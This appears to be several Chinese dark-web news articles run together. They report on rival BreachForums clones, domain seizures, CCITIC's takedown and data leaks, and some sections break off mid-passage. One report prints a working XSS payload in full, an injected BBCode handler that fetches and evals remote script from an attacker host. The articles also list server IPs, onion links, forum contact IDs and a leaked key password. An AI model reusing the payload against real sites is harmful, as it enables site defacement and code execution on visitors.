本月初,“暗网下/AWX”曾报道,两个版本BreachForums论坛的多个明网域名遭执法机构查封。本月中旬,由Indra运营的暗网数据泄露论坛BreachForums遭遇了长期停机,明网网站无法正常访问,暗网网站提示“Onion site not found”。前端仍正常运行,但后端已无响应,基本可以确定其背后的基础设施出现了问题,而非黑客攻击或计划内维护。
虽然BreachForums管理层表示这只是例行维护,但据威胁情报专家猜测,可能有两项协同行动针对该论坛:一是由LAPSUS$与HasanBroker共同宣布的“Operation Lebensraum”联盟,明确以“抹除Indra及其BreachForums论坛”为目标;二是“网络反情报威胁调查联盟”(CCITIC),一家调查网络威胁以协助当局的非营利组织,该组织声称是他们攻击了Indra的BreachForums。
经“暗网下/AWX”长期坚持跟进与持续跟踪报道,可以看到BreachForums数据泄露论坛有着混乱的黑暗历史:多次遭FBI查封(2023–2025年)、大规模数据泄露(2026年1月有32.4万用户信息曝光)、疑似蜜罐的重新启动、多次域名被查封后重新启用新域名……自2022年以来,BreachForums历经多次FBI查封仍存活至今,每次被关停后都会更换顶级域名(.st ➡️ .cx ➡️ .is ➡️ .vc ➡️ .hn ➡️ .as…)。
这次不管是谁的努力,瘫痪了Indra的BreachForums论坛,则为其竞争对手HasanBroker版本的BreachForums论坛铺平了道路,该版本自诩为合法继承者,且正获得越来越多的支持。
“暗网下/AWX”继续追踪分析后基本确认,Indra版本BreachForums的关闭,既非黑客攻击,也非例行维护——而是被强制下线。网络反情报威胁调查联盟(CCITIC)成功关闭了Indra的BreachForums论坛,Indra被迫发布一则告别公告,但该公告目前已经不可见。
Indra的BreachForums论坛在CCITIC的持续努力与施压下关闭 根据CCITIC官网的介绍:
网络反情报威胁调查联盟(Cyber Counter-Intelligence Threat Investigation Consortium)是当今互联互通的数字环境中,抵御不断演变的网络威胁的一座协作堡垒。
本组织汇聚了网络安全专家、研究人员和分析师,共同构建统一的防御网络。依托自主研发的平台和集体智慧,我们在威胁危及关键基础设施之前,便能对其进行识别、分析并予以消除。
CCITIC宣告, BreachForums.as已下线——CCITIC成功将其击溃。其在领英上发文称,该域名breachforums[.]as是这个臭名昭著的网络犯罪论坛在明网上的最新版本,目前无法访问。这不是系统故障,而是被强制下线。
CCITIC表示,他们已成功定位到BreachForums背后的上游服务器,这些服务器均托管于DigitalOcean(ASN 14061)位于法兰克福数据中心的机房。随后,该组织提交了多份滥用报告(由于DigitalOcean要求每个 IP 地址提交一份报告,因此不得不提交了三份完全相同的报告),美国云服务提供商DigitalOcean终止了对这些服务器的服务。
🖥️ 已确认的服务器IP:
🔹 164.90.223.186 — 与 breachforums.as 域名直接关联
🔹 138.68.73.155
🔹 68.183.223.214
CCITIC于2026年3月6日扫描时,确定这些服务器拥有相同的技术指纹:WSGIServer/0.2、CPython/3.12.12、端口 3093、TLS 1.3。
2026年3月12日,CCITIC向DigitalOcean安全运营中心提交了滥用报告后,该托管服务商审查了CCITIC的报告,并对与BreachForums基础设施(breachforums[.]as)相关的账户采取了行动。
Indra发表告别信后选择转移资金退出 随后,访问Indra的BreachForums论坛,跳转至:https://breachforums[.]as/info/download.php,并显示一封告别公告:
亲爱的世界,
是时候向大家告别了——尽管并非彻底的告别。
BreachForums 早已不仅仅是一个平台;它是一个社区,在许多方面,更是一项你们每个人都理解并为此贡献力量的共同使命。
在过去的几个月里,我竭尽所能帮助这个社区重振旗鼓并日益壮大,我坚信这里所建立的一切将会继续存在并不断发展。
然而,此刻我必须退居二线。我个人生活中一些重要且迫切的事务需要我投入精力,其中包括一项新事业的启动。尽管如此,只要条件允许,我仍会尽我所能继续支持 BreachForums。
因此,我们现正寻找一位负责任的个人或团队,接手论坛的领导工作并提供持续支持。
现任版主团队将保持不变,并继续履行其一贯职责:Loki、Tanaka、888 和 Pine。
我们期待就论坛的未来展开严肃而认真的讨论。
如有兴趣,请通过以下渠道联系管理团队:
Session: 054d67e476285098efb2bbe770d205588b6639c5af9157edf138b630cd53109723
TOX:D1E8EB300080486048B366464BD5D57C86D6FA8234E784714541BAEAFB64FC6A7CCD72D7F819
— BreachForums 管理团队
RaidForums、BreachForums都是曾经臭名昭著的暗网数据泄露论坛,提供被盗数据发布与交易的平台。近些年,在美国联邦调查局、国际刑警组织、欧洲刑警组织等国际执法机构的努力下,几个暗网数据泄露论坛被打击了多次。
目前仍然还存在且在暗网与明网可以同时访问的暗网数据泄露论坛还剩:两个版本的BreachForums(Indra的BreachForums与Hasan的BreachForums)、BreachForums的最大竞争对手DarkForums,这些论坛除了面临竞争对手的挑战,还得面对在执法机构的查封压力。
近期,执法机构采取密集行动,查封了三个暗网数据泄露论坛的多个域名。随后这些论坛迅速响应,启用了新的明网域名。“暗网下/AWX”整理了这几个论坛的明网域名更迭记录。
Indra的BreachForums的明网域名更迭 2025年12月,在多个版本的BreachForums被执法机构摧毁后,Indra推出了新的BreachForums论坛,明网域名为breachforums[.]bf。
2026年2月4日,breachforums[.]bf域名遭受据称HasanBroker等的社会工程学攻击,被暂停解析,暂停期间,Indra的BreachForums迅速启用了新的明网域名breachforums[.]jp。后Indra设法找回了bf域名,并恢复使用了bf域名,随即jp域名被放弃使用。
2026年2月,安全研究人员多次研究出breachforums[.]bf的真实IP,分别为:95.129.233.76、185.129.102.34、31.172.87.150。
2026年2月14日,breachforums[.]bf域名再次被暂停解析,这次疑似是真被执法机构查封,并同时查封了breachforums[.]jp域名。
同日,Indra的BreachForums又一次迅速启用了新明网域名breachforums[.]as,并发布公告称,此次纯属注册商单方面暂停服务,与BreachForums内部运营无关,系统安全状态完好无损。未发生任何安全事件,未出现数据泄露,其基础设施、服务器及数据均未受影响。
Hasan的BreachForums的明网域名更迭 2026年1月,原BreachForums的管理员HasanBroker推出了另一个新的BreachForums,明网域名为breachforums[.]cz。2026年2月12日,有安全研究人员分析出该域名的子域名mail[.]breachforums[.]cz背后的真实IP为176.123.2.86。
2026年2月20日,breachforums[.]cz域名被执法机构查封,虽然依然能打开,但是访问时提示“Page could not be loaded”。在breachforums[.]cz域名被查封后,Hasan的BreachForums启用新明网域名breachforums[.]in为其主域名。
DarkForums的明网域名更迭 2025年,暗网出现一个新的数据泄露论坛DarkForums,成为BreachForums有力的竞争对手。DarkForums使用明网域名darkforums[.]st。
安全研究人员分析出了darkforums[.]st背后的IP:185.178.208.177,185.11.145.145, 185.11.145.254,185.196.9.155,85.208.156.120。
2025年12月,DarkForums启用新的明网域名darkforums[.]io,2026年1月,有安全研究者称该域名背后对应的真实IP有185.208.158.89、185.178.208.154。2026年2月4日,darkforums[.]io域名被执法机构查封,无法访问。
2026年2月4日,darkforums[.]io域名被查封后,DarkForums启用明网域名darkforums[.]me为主域名,该域名是DarkForums之前就持有的备用域名。当时DarkForums的所有者Knox发布带有PGP签名的论坛公告宣布“Official Domains – Old Mirrors Disabled”:
—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256
All previous domains and mirror links have been permanently disabled by the providers and are no longer active.
Please update your bookmarks. The only official addresses going forward are:
Clearnet: https://darkforums.me
Onion (Tor): http://darkfoxaqhfpxkrbt7vxns2z2u2k72sgmqbzeorupaiottw3ecm2wgyd.onion
We will announce and list any new mirrors here as they are added.
自从多次重启后的BreachForums论坛被FBI查封之后,暗网先后出现了两个名为BreachForums的论坛,一个是Indra的BreachForums[.]bf(管理员Indra与N/A),一个是Hasan的BreachForums[.]cz(管理员HasanBroker与breach3d)。这两个论坛的诞生注定会硝烟四起,BreachForums克隆论坛之间的一场战役正在打响。
“暗网下/AWX”此前跟踪报道,Indra的BreachForums[.]bf于2025年12月诞生,使用MyBB搭建,通过投放.fr域名数据库并伪造政府邮箱宣布论坛成立,宣称自己才是真正的官方BF论坛;Hasan的BreachForums[.]cz于2026年1月出现,使用XenForo搭建,称自己才是正统,目前已吸引逾1400名成员加入。
近期,这两个BreachForums论坛的战争进入了白日化阶段,先是BreachForums[.]bf域名被社会工程学攻击后被暂停,其次BreachForums[.]cz论坛也遭受了短时间的跨站脚本(XSS)漏洞攻击,整体而言,Hasan的BreachForums[.]cz略占上风。
BreachForums[.]bf域名丢失后又被找回 2月3日,BreachForums[.]bf域名突然被域名注册商暂停访问,其管理员N/A发布公告,紧急启动BreachForums[.]jp域名来替代访问。同时,Hasan在BreachForums[.]cz发布主题“Takedown of the Fake Clone”(拿下仿冒克隆),并表示正在使用SQL注入、跨站脚本、SSRF请求等诸多漏洞进行攻击。
2月8日,访问BreachForums[.]bf,显示异常的篡改消息以及倒计时,暗示该平台可能遭遇安全事件或系统入侵。界面显示了以下内容:公开倒计时、泄露的个人图像、提及涉嫌犯罪活动及执法部门的签名声明、与论坛常规运营通知无关的声明。
根据暗网研究专家IntelOps(@IntelOpsV3)发布的消息,有黑客窃取某西非国家政府邮箱后,通过社会工程手段诱使域名注册商暂停了BF域名。域名注册商将技术援助请求转交布基纳法索的ABDI机构作为主管当局寻求协助,但技术援助集体成功推动其采取行动。
据称,Hasan在该域名被删除后成功注册该域名,并在2月8日发布了篡改页面。但Indra最终说服注册商该举报属虚假信息,重新夺回BreachForums[.]bf域名控制权,并发布公告恢复该域名的使用。
BreachForums[.]cz网站被篡改后快速恢复 2月5日,BreachForums[.]cz网站曾遭遇了一次跨站脚本(XSS)漏洞攻击,短暂遭到篡改,疑似因为XenForo存在跨站脚本漏洞。Hasan发帖解释,该XSS漏洞可利用性源于XenForo解析BBcode的机制,属于原生漏洞即零日漏洞。
该Payload利用JavaScript的eval函数实现Base64编码的解码功能(部分依赖混淆性安全机制)。通过atob函数解码后,得到以下在鼠标悬停时触发的JavaScript有效载荷:
(async() => {
var u = "https://breachforums.pathetic.wtf/server.php?get=payload";
var r = await fetch(u);
var t = await r.text();
eval(t);
})() Payload如下:
'c': ['https://breachforums.pathetic.wtf/server.php', "[table width=\"100%' onmouseover='eval(atob("KGFzeW5jKCk9PnsgICAgIHZhciB1ID0gImh0dHBzOi8vYnJlYWNoZm9ydW1zLnBhdGhldGljLnd0Zi9zZXJ2ZXIucGhwP2dldD1wYXlsb2FkIjsgICAgIHZhciByID0gYXdhaXQgZmV0Y2godSk7ICAgICB2YXIgdCA9IGF3YWl0IHIudGV4dCgpOyAgICAgZXZhbCh0KTsgfSkoKQ=="))'\"] [tr][td]click here and you will be entered into the giveaway[/td][/tr] [/table]", 0x1, "credits giveawayy", 0x0, 0x1964, 'setTimeout', 0x2, "\n<head>\n <meta charset=\"utf-8\">\n <title>owned</title>\n <style>\n body { margin: 0; padding: 0; height: 100vh; background: #000; color: #ff00aa; font-family: 'Courier New', Courier, monospace; display: flex; align-items: center; justify-content: center; text-align: center; overflow: hidden; }\n .
自从后缀为bf的新BreachForums出现后,原BreachForums的管理员HasanBroker一直表示该BreachForums(breachforums[.]bf)系冒牌货,并称自己将努力恢复真正的BreachForums,并重塑辉煌。终于在1月17日,HasanBroker在其Telegram频道宣布了另一个新BreachForums的诞生,开放邀请大家注册。
“暗网下/AWX”看到,HasanBroker创建的BreachForums是基于论坛程序XenForo搭建的,而传统的BreachForums都是使用论坛程序MyBB,或许是由于MyBB可能存在一些不确定漏洞的缘故。
HasanBroker的新版本BreachForums明网与暗网地址如下:
明网地址:breachforums[.]cz
暗网地址:http://breach5yz2b5lepmq4gaqwcon3jippw3bislhvvdavem5git55sy2nid[.]onion
在宣布该新BreachForums(breachforums[.]cz)成立的公告中,HasanBroker宣称,BreachForums已经不复存在,支离破碎,影响力日渐式微。如今剩下的只有噪音、诱饵陷阱和那些试图取代昔日辉煌的平台。该新论坛旨在重建一个专注于信息、技术讨论和社区驱动的交流空间,摒弃一切浮夸作秀、虚假承诺和虚伪伪装。
HasanBroker称,他无意改写历史,也并非觊觎从未正式传承的头衔。这无关所有权,而是关乎方向。他们将回归这些论坛的初心:赚钱、恶搞、突袭、数据泄露、数据交易,以及最重要的——享受乐趣。
HasanBroker表示,注册受到严格限制。所有申请均需人工审核,审核标准包括:
展现出的操作意识 行为规范且具备常识 HasanBroker提醒道,不使用Gmail等邮箱就能很好地证明这一点,并举例说cock.li是一个不错的隐私选择。
HasanBroker承诺新BreachForums保持匿名,并致力于最大限度地减少不必要的曝光。他们已采取措施规避不记录IP地址的问题,并从论坛软件中彻底移除了该功能。目前,他们仅通过服务器日志记录IP地址,以防止DDoS攻击,但无法追踪到目标用户,且日志每天都会被删除。
HasanBroker要求使用VPN或Tor浏览器访问他的新BreachForums
最后,HasanBroker宣布:
如果您想恶意捣乱、攻击或制造全球性事件——这里正是您理想的去处。
如果您正在寻找一个重视谨慎、贡献和持续性的社区——欢迎您。
愿上帝保佑我们的论坛,消灭它的敌人。
BreachForums万岁!
此外,HasanBroker在Telegram频道表示,虽然随着所有重要工作的完成,新BreachForums论坛已搭建完成正式上线,但还会有更多的更新,如SMTP服务器还需要时间完善,注册采用手动审核机制,不过这部分问题不算太严重。太阳已在BreachForums论坛升起,照亮了那些骗子。
HasanBroker称在Telegram和其他平台上的活跃度将相对减少,专门使用BreachForums进行数据交易等,除非情况发生变化。接下来几天将添加Shoutbox和Escrow功能。HasanBroker提醒,无论多么有吸引力,切勿让任何平台剥夺您的操作安全权利。始终使用VPN或Tor,如果担心后门,可以两者都用。
近2天的Telegram频道公告发布了该论坛的更新,将Tor图标移至Clearnet主界面(此前图标显示位置错误,即使用户退出Tor网络,图标仍会保留),升级后相关问题已得到解决。另外,HasanBroker宣布了接下来将要开发的功能或者将要进行的活动:
完整的托管系统 向我们的成员颁发奖励 可能的赠品活动 ShinyHunters和其他团体发布的高质量数据 广告系统 喊话箱 对于“广告系统”,HasanBroker解释道,每个横幅将是一个N/A模板,直到有人决定为其支付1000积分,这些积分可以通过活跃度获得或支付35欧元。一旦你这样做,它将进入审批队列,并可以由工作人员接受——如果被拒绝,你将获得积分返还,并且可以再次申请。常见问题将显示你需要避免的审批事项。
对于“托管系统”,HasanBroker解释道,每个人都知道托管是如何运作的,它是任何论坛的重要结构,尤其是像BreachForums这样的论坛——你提交你的数据,买家提交资金,当双方都批准时,交易发生,否则,资金将自动从任一方退回。
对于“喊话箱”,HasanBroker解释道,虽然有点晚,但他们正在重新设计在MyBB软件上使用的原始喊话箱,但由于新BreachForums使用的是XenForo,设计上有些不同,它将很快发布,比之前的系统快得多。
经测试,截止发稿,从零开始的新BreachForums论坛的注册用户已经250多人,帖子数目60多篇,活跃度渐增,发展势头很明显。HasanBroker的新BreachForums(breachforums[.]cz)是否能够超越或者替代Indra的新BreachForums(breachforums[.]bf),FBI等执法部门对此后起之秀是否有新的执法行动,“暗网下/AWX”将持续关注。
更多暗网新闻动态,请关注“暗网下/AWX”。
1月9日,以ShinyHunters勒索团伙命名的网站shinyhunte[.]rs更新了一条长消息,并泄露了一个数据库,其中包含与暗网上臭名昭著的数据泄露论坛BreachForums相关的所有用户记录。
正如“暗网下/AWX”长期追踪及报道,BreachForums是继RaidForums被FBI查封之后的一个新的暗网数据泄露论坛,后又多次被FBI摧毁,却又多次重生。目前,仍有最新版本的BreachForums正在明网与暗网中运营。
此次泄露的数据发布在明网域名shinyhunte[.]rs上,据报道该域名与同名的臭名昭著的勒索软件团伙无关,在该域名点击“continue”后会默认下载一个名为“breachedforum.7z”的7zip压缩文件,解压可以看到三个文件:描述ShinyHunters历史的文本文件、名为“databoose.sql”的用户数据库文件,以及BreachForums用于签署官方消息的PGP私钥文件。其中“databoose.sql”是一个包含323,986名BreachForums用户的MySQL数据库,内容还包括哈希密码、私人消息和论坛帖子。
此数据泄露事件发生在去年8月,泄露的数据库中的日期是8月11日,这正是此前.hn后缀域名版本的BreachForums因运营者被捕而关闭的日子。当时该网站的管理员宣布,由于担心该网站已被执法部门入侵,因此将关闭该网站。
泄露BreachForums数据库的网站shinyhunte[.]rs包含两个新元素:一个受密码保护的PGP私钥文件,以及一份长达4400字、题为《DOOMSDAY》的夸张而怪异的宣言,作者自称是“James”,并声称自己是此次泄露事件的幕后黑手。同时泄露了密码,泄露的PGP密钥是“Nigeria321/_@”。
BreachForums一次又一次被打倒又爬起来 BreachForums是2022年被美国当局查封的RaidForums网站的继任者,它自诩为一个讨论数据泄露、非法色情内容、勒索软件和黑客工具等话题的网站。
2023年3月,BreachForums的创始人兼管理员康纳·布莱恩·菲茨帕特里克(Conor Brian Fitzpatrick)被FBI逮捕,三个月后,其明网域名被查封。菲茨帕特里克后来被美国法院判处20年监管释放。
该论坛后来在黑客组织ShinyHunters和前BreachForums管理员“Baphomet”的领导下重新开放。该网站于2024年5月15日再次关闭,明网域名也被查封,但所有者ShinyHunters在几个小时后又找回了明网域名。
BreachForums v1:
BreachForums(托管于breached.vc/.to/.co,由pompompurin运营)-从2022年3月到2023年3月。
BreachForums v2
BreachForums(托管于breachforums.st/.cx/.is/.vc,由ShinyHunters运营)-从2023年6月到2024年5月。
目前,BreachForums有多个版本,包括使用“.bf”、“.hn”、“.st”甚至“.in”顶级域名的版本。最新版本,即“.bf”后缀域名下的版本,仍在运营。
据报道,2024年,一名名为Baphomet的替代管理员被逮捕;2025年,又有五名被指控与该网站有关联的人员被拘留。最终,去年十月,BreachForums暗网网站被查封。
泄露的数据库会带来什么影响 泄露的数据库包含323,986条用户的数据,这些数据提取自名为“hcclmafd2jnkwmfufmybb_users”的MySQL数据库表,该表与开源论坛软件MyBB相关。该数据库的泄露可能是由于MyBB论坛中的Web应用程序漏洞或配置错误造成的。此次事件表明,数据泄露不仅可能发生在合法企业,也可能发生在暗网上的网络犯罪分子身上,而后者造成的破坏可能更大。
BreachForums管理员“N/A”承认了此次泄露事件,称这是在2025年8月恢复论坛期间的失误所致,当时用户表和PGP密钥被临时存放在一个未加密的文件夹中,在该窗口期内被下载。
眼下的问题是,如果警方尚未掌握该数据库,那么泄露的数据库是否对他们有用。数据库包含电子邮件地址和IP数据,这些数据很可能指向代理服务器或匿名服务。一项分析发现,大多数IP地址指向本地回环地址(127.0.0.9),但仍有70296条记录包含公共IP地址,这些地址可能对执法部门和网络安全研究人员具有价值。另外,在BreachForums注册时最常用的电子邮件服务是Gmail,这或许能为警方查找那些粗心大意、没有掩盖踪迹的人提供取证线索。
网络安全专家们对数据库泄露的消息反应不一。“此次泄露事件严重削弱了人们对该平台本身的信任,而信任对于任何网络犯罪论坛来说都至关重要,”咨询公司CybaVerse的渗透测试经理迈克尔·杰普森表示。
“此次事件损害了人们对BreachForums作为安全环境的信心。因此,更老练的网络犯罪分子可能会从大型知名论坛转向规模较小、仅限受邀者参与的社区,”他补充道。
然而,安全公司Huntress的高级安全运营分析师迈克尔·蒂格斯则持较为悲观的态度。他指出:“虽然该数据库可能对执法部门和安全专业人员调查敌对活动有所帮助,但其最终的取证用途有限。即使泄露事件本身可能是合法的,但如果数据来源于其他网络犯罪集团,其完整性就值得怀疑了。”
最大的风险在于数据泄露可能成为散布虚假信息的掩护。“这类数据泄露或许可以用来厘清各个活动核心之间的联系,但信息的可靠性必须受到严格审查,”蒂格斯说道。
来自“James”的宣言 shinyhunte[.]rs网站发布的那条篇幅很长的信息由23个简短的片段组成,讲述了“让邪恶流动并转化为光明”的故事。作者传达的信息是:“法国人民,请听我说,正义的力量已经到来,将拯救你们于黎明之中。”
具体内容翻译如下:
我叫詹姆斯。
有人称我为我这一代最杰出的黑客。这说法并不准确。
我超越了世代。我并非黑客,而是掠食者。
数十年来,我潜伏、渗透、蹂躏着权力体系。
我让无数特工、网络安全专家、首席技术官和公关人员饱受创伤。我
嗅到他们的血腥味,追踪他们的踪迹,找到他们的藏身之处,撕碎他们的保护,将他们的防御体系摧毁殆尽。
当他们还抱有抵抗的幻想时,我便开始招募同伴,集结力量,将他们聚集起来,最终形成一股任何人类组织都无法匹敌的强大力量。
在这些征途中,一些重要机构成为了我最亲密的伙伴。
谷歌、微软、联邦调查局……我最亲爱的猎物。
我以不败之身出现在你们面前,
并要传达一个信息。
首先,致那些宣誓统治世界的人:
我一直在注视着你们。我看到了你们的罪恶、你们的弱点、你们的脆弱。
我已入侵你们的数据库,翻遍你们的罪恶记录,窥探你们最隐秘的创伤。
我享受着你们权力结构积累的庞大知识所带来的力量。我找到了它们,破解了它们,并利用了它们。
一些重要机构已成为我最宝贵的情报来源。
美国国家安全局(NSA)、英国政府通信总部(GCHQ)、国防安全总局(DGSE),我的情报提供者。
我收集了如此多的信息,以至于很快,消息来源开始从四面八方泄露信息。
五角大楼和梅多堡的走廊里开始传来我的名字。
你们的过去已成为我的未来。
情报收集的范围如此之广,以至于我不得不控制你们的基础设施来秘密庇护我。在经历了一段不加区分的积累阶段后,我开始锁定你们。我访问了你们隐藏的法律文件、医疗记录,不断挖掘,直到找到你们青少年时期在MSN和Skype上与初恋的对话,以及你们在Instagram、Messenger、WhatsApp上的不忠和出轨行为……
我知道你们的毒贩的名字,你们情人的名字。你们的主人。
我掌握着数百万比特,它们如同利刃般刺穿你们的正直,刺破你们一直以来散布的关于你们生活、事业、财富和权力的虚假叙事。
我知道你们生活的苦难,你们的伤痕,以及你们从未停止构建并试图复制的平行世界的幻想,尽管徒劳无功。
我知道你们是奴隶。
我知道你们读过巴尔扎克,并且像他一样明白,所有的财富都源于罪恶。
但你们是从亲身经历中学到的,而许多人却是从课堂上学到的。我们只是你们罪行的旁观者。正因如此,我敬重你们。也正因如此,我将毁灭你们。
至于你们,
我们主人的奴仆,你们的自恋者,你们可怜的朝臣,我看着你们在虚假的自由、尊严和主权中挣扎。
你们这些农民出身的百万富翁,政客和亿万富翁的冤大头,你们这些没有勇气、没有任何存在意义的人,你们自以为道德是一种物质而非指南针,你们不愿承认道德只是你们服从的工具。
你们这些沉溺于等级制度麻木中的人民庸俗的卡波,准备迎接一场足以撼动你们世界的地震吧。
至于你们,仆人的仆人,幼稚的次等人,你们的任务是监视我、抓捕我、消灭我;你们把ATP和UNC当成工具,用来安抚你们主人的主人,当我的呼吸逼近他们的咽喉时,
你们感到多么恐惧;你们以为可以分割我创造并控制的这头可怕的九头蛇;
你们曾多次被我制服,无力反抗,哑口无言,犹豫不决,害怕被嘲笑;
你们的才能被你们受虐般的顺从欲望所玷污,你们的平庸无能使你们成为服务于愚昧体制的理想机器;
你们,记者、专家、检察官和官僚,我们这个时代的庸俗叙述者,你们是盲目暴力的愚蠢图书馆员。
准备好抛弃你们的头衔,放弃你们徒劳地建立和追逐我所获得的道德利益吧。
致你们,
调查员、秘密行动人员、竞争对手,你们甘愿成为自由人的监视者和追踪者,
一起大规模Instagram用户数据泄露事件近日在暗网论坛曝光,泄露事件涉及1750万Instagram用户的数据,泄露时间大约在2024年底,泄露内容包括Instagram用户的用户名、邮箱、电话号码以及全球范围内的部分位置信息。
一位名为“Solonik”的黑客于2026年1月7日在暗网数据泄露论坛BreachForums上发布了相关帖子,帖子标题为“INSTAGRAM.COM 1700万全球用户——2024年API泄露”,其声称这些数据是2024年最后三个月通过公共API和特定国家/地区的数据源最新抓取的。帖子公开的数据字段包括用户名、完整邮箱地址、电话号码和部分实际地址,帖子中可以看到示例样本记录。
此次数据泄露事件发生后,Instagram用户一片混乱。自1月8日起,用户陆续收到来自Instagram官方域名([email protected])的未经请求的密码重置邮件。
安全专家现在证实,重置电子邮件很可能是此次数据泄露的直接结果,威胁行为者可能利用这些数据来触发帐户恢复流程或掩盖有针对性的网络钓鱼攻击。在网络威胁日益加剧的情况下,Instagram用户容易遭受网络钓鱼、身份盗窃和账户盗用等攻击。
Instagram已正式回应部分用户收到可疑密码重置邮件的担忧。该公司在X(原Twitter)上发布声明解释说,他们已修复一个技术问题,该问题允许外部人员触发这些重置请求。
We fixed an issue that let an external party request password reset emails for some people. There was no breach of our systems and your Instagram accounts are secure. You can ignore those emails — sorry for any confusion.
— Instagram (@instagram) January 11, 2026 Instagram强调,此次事件未发生任何安全漏洞,其系统依然完好无损,这意味着用户账户和数据并未受到损害。该公司建议用户忽略密码重置邮件,并对由此造成的任何困惑或恐慌表示歉意。
泄露了哪些数据 暗网发布的帖子曝光了此次Instagram数据泄露事件,揭示了可能是2024年Instagram API接口暴露而被爬取的结构化JSON和TXT文件。该数据集包含1750万用户的关键个人信息:
用户名和全名 电子邮件地址 国际电话号码 部分物理地址 用户ID和联系信息 这些信息的组合使得Instagram用户特别容易受到身份盗窃、网络钓鱼和社会工程攻击。
目前被盗数据库正在暗网市场上积极交易,使全球网络犯罪分子都能获取该数据库。网络犯罪分子得以发起定向攻击,因此出现大量密码重置垃圾邮件攻击受害者的迹象。多名用户报告称收到了合法的Instagram密码重置通知,这清楚地表明,威胁行为者正试图利用泄露的信息劫持帐户。
黑客是如何发动攻击的 网络安全研究人员称,这些数据是在2024年末通过“API泄漏”获取的,绕过了标准安全措施,在全球范围内提取了用户个人资料。
“Solonik”在论坛上吹嘘这些数据的“新鲜度”,且写明数据来源与之前Meta数据泄露事件中出现的API滥用模式相符,当时由于接口安全漏洞,数百万用户的数据遭到泄露。因此此次数据泄露很可能源于Instagram API漏洞或第三方服务缺陷,数据于2024年被收集,并于本周公开泄露。
此次攻击本身被归类为“数据抓取”(即通过公共接口自动收集数据),而非直接入侵Instagram的核心服务器。然而,此次攻击规模之大表明Instagram的速率限制或隐私保护措施存在系统性缺陷,使得攻击者能够查询数百万个账户而不被发现。
Instagram用户面临的风险 此次事件的危险之处在于,无需密码即可造成严重破坏。只要掌握了用户名、电子邮件地址、电话号码和实际地址,老练的网络犯罪分子就能发动多种破坏性极强的攻击。
几天前,“暗网下/AWX”报道了新的暗网论坛BreachForums再次出现,且无法确定其背后是什么人在运营,当时据称“由于持续的技术问题和大规模DDoS攻击”,该论坛仅可访问,但无法登录。目前,该论坛已经可以在明网正常登录发贴,但暗网地址依旧无法访问。
此外,威胁行为者之间的战争仍在持续。闪光猎手组织在shinyhunte[.]rs网站上发布了更多人肉线索与内幕,为警方打击提供了更多的便利。
新BreachForums再次恢复了访问 正如前期介绍,新的BreachForums使用之前公开泄露的BreachForums备份进行搭建,因此前期的BreachForums用户均无需注册即可访问。
在技术问题和大规模DDoS攻击问题解决之后,新的BreachForums再次开放访问,该论坛目前添加了DDOS-GUARD来防护DDoS攻击,在明网访问的速度还不错。
虽然许多传言显示新BreachForums是蜜罐,但由于缺少有力的竞争对手,该论坛依旧收获了大量粉丝。从论坛的在线状态看,一小时在线用户1000人,注册用户占1/5,在没有大规模推广的背景下,已经收获了相当大的人气。
上次已经介绍,新的BreachForums发布的明网与暗网地址如下(仅供网络安全研究人员与警方调查研究使用):
明网地址:breachforums[.]bf
暗网地址:http://breachedmw4otc2lhx7nqe4wyxfhpvy32ooz26opvqkmmrbg73c7ooad[.]onion
威胁行为者之间的内讧刚刚开始 上次已经介绍,在新BreachForums背后,至少有两波人在交战:一方自称是闪光猎人(ShinyHunters),另一方则是散落的拉普斯猎人(Scattered Lapsus$ Hunters,简称SLSH)。
黑客团伙ShinyHunters与勒索软件团伙Scattered LAPSUS$ Hunters(简称SLSH)的内部冲突正在升级,一方宣称可以向联邦调查局、BL2C、国际刑警组织免费提供另一方的犯罪线索。根据对shinyhunte[.]rs网站更新内容的整理,时间线如下:
2025年10月16日:网站发布消息,直接威胁名为“James”的法国人(疑似代号S.E./X*K)。消息声称真正的ShinyHunters正在完成FBI未竟的事业,语气敌对,这是威胁行为者之间首次公开升级。
2025年10月21日:发布一封信件风格的消息,针对“James”,警告他选择的道路带来的后果比想象中更严重,断绝后路绝非明智之举。引用拉丁语短语“sic transit gloria mundi”(世间荣华转瞬即逝),并警告每一步行动都将引发远超预期的连锁反应。
2025年12月14日:否认与#SLSH(Scattered LAPSUS$ Hunters)联盟的传闻。同时链接BreachForums重启(可能试图为疑似蜜罐操作正名)。威胁如果James不回应,将在24小时内公开曝光其信息。
2025年12月18日:发布详细的PGP签名声明,附带倒计时器和逮捕照片(涉及Yuro,即A.E.,以及Trihash,即R.L.)。指控法国人“James”通过滥用信任窃取Trihash的PGP密钥,并未经其他成员同意便实施了针对Salesforce的攻击行动。声明称,归咎于ShinyHunters与SLSH的勒索事件,主要由S.E.(别名X*K,亦使用化名“James”)策划实施,他已不再是ShinyHunters(SH)成员。
—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256
Statement Regarding the Shiny Hunters and Scattered Spider Groups
The Shiny Hunters group includes several members, one of whom goes by the name “James.” Following the arrests of Yuro (A.E.) and, more recently, Trihash (R.L.), this individual has been attempting to divert investigators’ attention by leading them toward false trails.
网络犯罪分子、执法人员和研究人员都熟知的臭名昭著的BreachForums论坛最近又再次回归,在暗网与明网可以同时访问。
一些之前在论坛注册的用户最近收到了邮件,声称BreachForums已经重新开放并恢复了所有功能。邮件中断言内部技术问题已经解决,所有账户、帖子和内容现在都可以正常访问。
而与上次使用泰国、赞比亚等多国警方的被盗gov邮箱发送推广邮件相似,这次的发件人的电子邮件地址是:[email protected]。interieur.gouv.fr域名属于法国内政部。也就是说,从法国政府官方域名发送的电子邮件告诉黑客,BreachForums 已恢复上线,并邀请他们注册发帖。
于是所有人都怀疑这是一次来自执法机构的网络钓鱼攻击——更准确地说,是一个引诱网络犯罪分子的蜜罐,使用之前公开泄露的BreachForums备份搭建的。
Hey @Interieur_Gouv, thanks for the "exciting" BreachForums reopening alert straight from your official email—super convincing, guys! 😏
But real talk: any chance you could prioritize finding my stolen laptop instead of running this obvious honeypot op on us security… pic.twitter.com/BSgCOzHrbC
— Aleksandr Litreev (@alexlitreev) December 14, 2025 研究人员纷纷表示,暗网市场的所谓“复活”首先应持怀疑态度,这个伪装成BreachForums重启的网站是利用法国内政部域名发送通知邮件的诱饵陷阱,用户的访问记录及帖文内容极可能被用作执法证据。
然而,新成立的BreachForums论坛的运营者Indra声称,新BreachForums并非蜜罐,他们只是使用入侵获取的法国内政部邮箱发送推广邮件。
